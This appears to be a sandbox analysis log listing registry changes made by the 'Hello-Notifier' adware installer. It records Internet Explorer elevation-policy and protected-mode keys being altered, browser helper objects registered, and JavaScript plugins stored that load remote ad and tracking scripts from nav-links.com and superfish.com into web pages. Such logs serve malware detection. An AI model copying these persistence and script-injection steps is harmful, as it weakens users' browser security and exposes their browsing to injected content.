| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Approved Extensions | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppName = "Hello-Notifier-buttonutil64.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Isolation = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\AppName = "Hello-Notifier-enabler.exe-codedownloader.exe" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\AppName = "Hello-Notifier-enabler.exe-buttonutil64.exe" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\DefaultValue = "PMIL" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{718F2CC1-8611-4C30-858F-4FA0ECD619AD}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2AC4E7B1-83BE-4E44-9252-46C4429AC346} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2AC4E7B1-83BE-4E44-9252-46C4429AC346}\AppName = "Hello-Notifier-enabler.exe-buttonutil.exe" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51} | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\AppName = "Hello-Notifier-buttonutil.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Hello-Notifier-bg.exe = "8000" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7DCF6270-3651-47F3-9FB9-4FF41A7ECC5}\Policy = "3" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{AF5263F2-24A4-44CE-BF3C-C5AA3262B51}\Policy = "3" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0} | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0}\Policy = "3" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" | C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\123\JavaScript = "\n//------------------ PLUGIN intext_adv_m START ------------------\nif (typeof appAPI.internal.monetization === \"undefined\") { appAPI.internal.monetization = {}; }\nif (typeof appAPI.internal.monetization.plugins === \"undefined\") { appAPI.internal.monetization.plugins = {}; }\n\nappAPI.internal.monetization.plugins[123] = function() {\n\n if (!appAPI.internal.monetization.shouldRunByVertical(123, [\"intext\"])){\n return;\n }\n\n\t// boris don't want it on youtube for shop helper\n\tif (appAPI.appID == 33256 && appAPI.dom.location.href.indexOf(\"youtube.com\") !== -1) {\n\t\treturn;\n\t}\n\n\tif (!appAPI.dom.isHttps()) {\n\t\tappAPI.dom.addRemoteJS(\"http://intext.nav-links.com/js/intext.js?afid=crossrider&subid=\" + appAPI.internal.monetization.getSubId() + \"&maxlinks=8&linkcolor=#0000FF\");\n\t}\n};\n//------------------ PLUGIN intext_adv_m END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\4\Version = "4" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\207 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\183\Name = "tabsWrapper" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\39\Url = "http://app-static.crossrider.com/plugins/mins/ie/IEDatabase.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\38\Name = "IECallbacks" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\13\Url = "http://app-static.crossrider.com/plugins/mins/CrossriderAppUtils.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Crossrider | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\Params = "{\n \"source_id\" : \"000249\",\n \"sub_id\" : \"0\",\n \"uzid\" : \"0\"\n}\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\43\Version = "5" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\102\Version = "5" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\ProgID | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\64\Url = "http://app-static.crossrider.com/plugins/mins/appApiMessage.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\42\Version = "9" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\Name = "hooks" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\PopupPluginList = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ = "C:\\Program Files (x86)\\Hello-Notifier\\Hello-Notifier-bho64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\UpdateInterval = "360" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\17 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Implemented Categories\ | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CurVer\ = "CrossriderApp0037928.Sandbox" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\JavaScript = "\n//------------------ PLUGIN hooks START ------------------\nappAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};\n//------------------ PLUGIN hooks END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.Sandbox\CurVer\ = "CrossriderApp0037928.Sandbox" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\FullVersionForUrl = "1_34_1_29" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer\SrcId = "000249" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\Manifest = "NA" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\183\Url = "http://app-static.crossrider.com/plugins/mins/tabsWrapper.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\125\Url = "http://app-static.crossrider.com/plugins/javascripts/monetization/geo/arcadi2_m.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{22222222-2222-2222-2222-220322792228}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{55555555-5555-5555-5555-550355795528}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Installer | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\104 | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\93\JavaScript = "\n//------------------ PLUGIN superfish_no_coupons_m START ------------------\nif(typeof appAPI.internal.monetization===\"undefined\"){appAPI.internal.monetization={};}if(typeof appAPI.internal.monetization.plugins===\"undefined\"){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[93]=function(){if(typeof appAPI.internal.monetization.verticals!==\"undefined\"){if(!appAPI.internal.monetization.verticals.shopping){return;}}try{if(!appAPI.dom.isHttps()){appAPI.dom.addRemoteJS({url:\"http://www.superfish.com/ws/sf_main.jsp?dlsource=hhvzmikw&userId=abc&CTID=\"+appAPI.internal.monetization.getSubId()});}}catch(a){throw new Error(\"something_went_wrong_in_superfish_\"+a.message);}};\n//------------------ PLUGIN superfish_no_coupons_m END ------------------\n" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\93\Url = "http://app-static.crossrider.com/plugins/mins/monetization/geo/superfish_no_coupons_m.js" | C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe | N/A |
